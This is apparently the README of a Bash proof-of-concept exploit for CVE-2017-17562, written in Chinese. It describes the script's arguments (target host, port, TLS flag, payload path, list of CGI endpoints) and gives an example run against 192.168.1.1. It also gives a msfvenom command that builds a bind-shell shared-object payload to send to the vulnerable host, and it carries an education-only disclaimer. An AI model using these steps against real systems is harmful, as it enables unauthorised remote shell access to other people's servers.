一个用于CVE-2017-17562的BashPoC实现。
需要curl来构造HTTP请求。
基于Metasploit和@fssecur3的实现。
以下参数必须设置,因为它们是侦察和载荷发送所必需的:
$1: 被攻击远程脆弱主机的IP/主机名
$2: 远程机器Web服务器的端口
$4: 发送给脆弱主机的精心构造的载荷路径
可选地,以下参数也可以设置:
$3: Web服务器是否运行在TLS/SSL隧道下。默认为否
$5: 已知脆弱CGI端点列表的路径,用于侦察阶段。默认为"cgi.endpoints"
bash exploit.bash 192.168.1.1 80 yes payload.so cgi.endpoints
本代码仅用于学习和演示目的。你不得将其用于未经许可的目标。
本仓库不提供任何载荷。但是任何匹配目标操作系统架构的二进制文件应该都能工作。要构造一个绑定shell载荷,你可以使用msfvenom:
msfvenom -a <instruction_set> --platform <os> -p generic/shell_bind_tcp LHOST=<attacker_ip_address> LPORT=<target_bind_port> -f elf-so -o payload.so